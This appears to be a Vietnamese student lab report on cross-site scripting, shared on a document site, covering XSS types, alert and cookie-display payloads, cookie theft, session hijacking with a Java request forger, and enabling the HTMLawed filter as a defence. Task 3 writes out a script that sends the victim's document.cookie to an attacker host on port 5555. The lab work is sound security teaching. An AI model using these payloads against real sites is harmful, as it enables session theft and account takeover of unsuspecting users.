1. Trang chủ
  2. » Luận Văn - Báo Cáo

Báo cáo bài thực hành tấn công cross site scripting vào máy chủ web môn an toàn ứng dụng web và cơ sở dữ liệu

11 0 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Báo cáo bài thực hành tấn công cross site scripting vào máy chủ web
Tác giả Ninh Thị Thu Trang, Lê Thị Khánh
Người hướng dẫn Giảng viên: Họ và tên
Trường học Học Viện Công Nghệ Bưu Chính Viễn Thông
Chuyên ngành An toàn ứng dụng Web và Cơ sở dữ liệu
Thể loại Báo cáo
Năm xuất bản 2024
Thành phố Hà Nội
Định dạng
Số trang 11
Dung lượng 1,68 MB

Nội dung

Lỗ hổng này cho phép kẻ tấn công chèn m độc ví dụ: các chương trình JavaScript vào trình duyệt web của nạn nhân.. Bằng cách sử dụng m độc này, kẻ tấn công có thể đánh cắp các thông tin

Trang 1

HỌC VIỆN CÔNG NGHỆ BƯU CHÍNH VIỄN THÔNG

KHOA AN TOÀN THÔNG TIN - o0o -

BÁO CÁO BÀI THỰC HÀNH Tấn công Cross Site Scripting vào máy chủ web

Ging viên: Ninh Th Thu Trang

Họ và tên : L Th Khanh

Mã sinh viên : B21DCAT109

Hà Nội - 2024

Trang 2

1 Tìm hiểu lý thuyt

1.1 Cross-site scripting

Cross-site scripting (XSS) là một loại lỗ hổng thường thấy trong các ứng dụng web Lỗ hổng này cho phép kẻ tấn công chèn m độc (ví dụ: các chương trình JavaScript) vào trình duyệt web của nạn nhân Bằng cách sử dụng m độc này, kẻ tấn công có thể đánh cắp các thông tin xác thực của nạn nhân, chẳng hạn như cookie phiên làm việc Các chính sách kiểm soát truy cập (ví dụ: chính sách cùng nguồn gốc) được trình duyệt sử dụng để bo vệ các thông tin này có thể b vượt qua bằng cách khai thác lỗ hổng XSS Những lỗ hổng dạng này có thể dẫn đn các cuộc tấn công quy mô lớn

Có 3 loại XSS chính:

• Stored XSS: Xy ra khi m độc được lưu trữ vĩnh viễn trên máy chủ và được chạy mỗi khi người dùng truy cập vào trang

• Reflected XSS: Xy ra khi m độc được nhúng trong URL hoặc các yêu cầu HTTP

và được phn hồi ngay lập tức khi người dùng truy cập

• DOM-based XSS: Xy ra khi lỗ hổng nằm ở phía client và dữ liệu không được gửi lên máy chủ mà b sửa đổi trực tip trên DOM của trang

1.2 Javascript và Web Developer / Network tools

JavaScript là ngôn ngữ lập trình phía client được sử dụng rộng ri để thêm tính tương tác cho các trang web Trong bài lab này, JavaScript là công cụ chính để thực hiện các cuộc tấn công XSS Kẻ tấn công có thể chèn m JavaScript độc hại vào các biểu mẫu (form), và khi người dùng khác truy cập vào hồ sơ b nhiễm, đoạn m này sẽ được thực thi trong trình duyệt của họ

Các tính năng sử dụng : document.cookie document.write() alert() , ,

1.3 Web Developer / Network tools

Công dụng của network tools :

• Xem các request đ được gửi đi

• Xem các thông tin nhận về

• Block các request không mong muốn

• Kiểm thử trang web với các điều kiện khác nhau (internet chậm nhanh, cache có hoặc không )

1.4 Ajax và Java

Ajax là một kỹ thuật sử dụng JavaScript để gửi và nhận dữ liệu từ máy chủ mà không cần phi ti lại toàn bộ trang web Trong bài lab này, Ajax có thể được sử dụng để gửi các yêu cầu HTTP bất đồng bộ (asynchronous) nhằm ăn cắp dữ liệu hoặc thực hiện hành

vi trái phép mà người dùng không nhận ra

Trang 3

Trong bài lab, Java được sử dụng để thực hiện các cuộc tấn công gi mạo phiên làm việc (Session Hijacking) Điều này được thực hiện bằng cách gửi các yêu cầu HTTP có chứa cookie phiên của nạn nhân tới máy chủ Java là một ngôn ngữ lập trình mạnh mẽ,

có thể được sử dụng để tự động hóa việc gửi các yêu cầu HTTP với đầy đủ thông số và

dữ liệu cần thit cho các cuộc tấn công

2 Nội dung thực hành

2.1 Task 1 : Sử dụng m độc hại hiện th cửa sổ cnh báo

- Đăng nhập tài khon Samy với máy attacker và Alice với máy victim

- Trong profile của Samy chèn m : <script>alert('XSS');</script>

Trang 4

Lưu lại > Kt qu :

Trang 5

-Vào mục more chọn member bên tài khon alice

2.2 Task 2 : Sử dụng m độc hại hiện th Cookies trên cửa sổ cnh báo

- Chèn mã : <script>alert(document.cookie);</script>

➔ Kt qu :

Trang 6

Lấy được cookie

2.3 Task 3 : Ăn cắp Cookies từ máy của nạn nhân

- Chèn mã <script>document.write('<img src=http://attacker_IP_address:5555?c= escape(document.cookie) + ' >'); </script> ( Với đa chỉ máy attack là : 172.25.0.3)

Trang 7

- Sau đó mở terminal của attacker chạy chương trình echoserver để lắng nghe các yêu cầu HTTP và thu được cookie của máy victim

-

2.4 Chim đoạt phiên làm việc (Session Hijacking)

- Mở terminal của attacker và vào thư mục chứa file HTTPSimpleForge

- Chỉnh sửa chương trình Java trong HTTPSimpleForge.java để thêm cookie đ đánh cắp(ở task 3)

Trang 8

-

- Biên dch và chạy chương trình

➔ Kt qu tr về 200 -> khai thác thành công

- Load lại trang của máy victim ta nhận được kt qu tài khon alice đ kt bạn với tài khon samy

Trang 9

2.5 Phòng chống

- Đăng xuất và đăng nhập tài khon admin

Trang 10

- Sau đó chọn Plugin và lọc Security and Spam và kích hoạt HTMLawed 1.8

- Thử lại với task 1 và task 2

Trang 11

3 Kt luận

Qua bài lab, chúng ta đ khám phá và thực hiện một số kỹ thuật khai thác lỗ hổng Cross -Site Scripting (XSS), một trong những lỗ hổng bo mật phổ bin và nguy hiểm nhất trong các ứng dụng web Thông qua các nhiệm vụ, ta thấy được cách kẻ tấn công có thể

sử dụng m độc JavaScript để thực hiện các hành vi bất hợp pháp như đánh cắp cookie, chim đoạt phiên làm việc (session hijacking), và thậm chí lan truyền m độc qua các hồ

sơ người dùng Từ đó người dùng có cái nhìn sâu hơn về những rủi ro tiềm tàng trong các ứng dụng web và các bước cần thit để gim thiểu các rủi ro này Việc hiểu rõ cách thức hoạt động của các công cụ bo mật và các nguyên tắc lập trình an toàn là rất quan trọng để bo vệ các hệ thống web trong môi trường thực t

Ngày đăng: 23/02/2025, 21:28

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN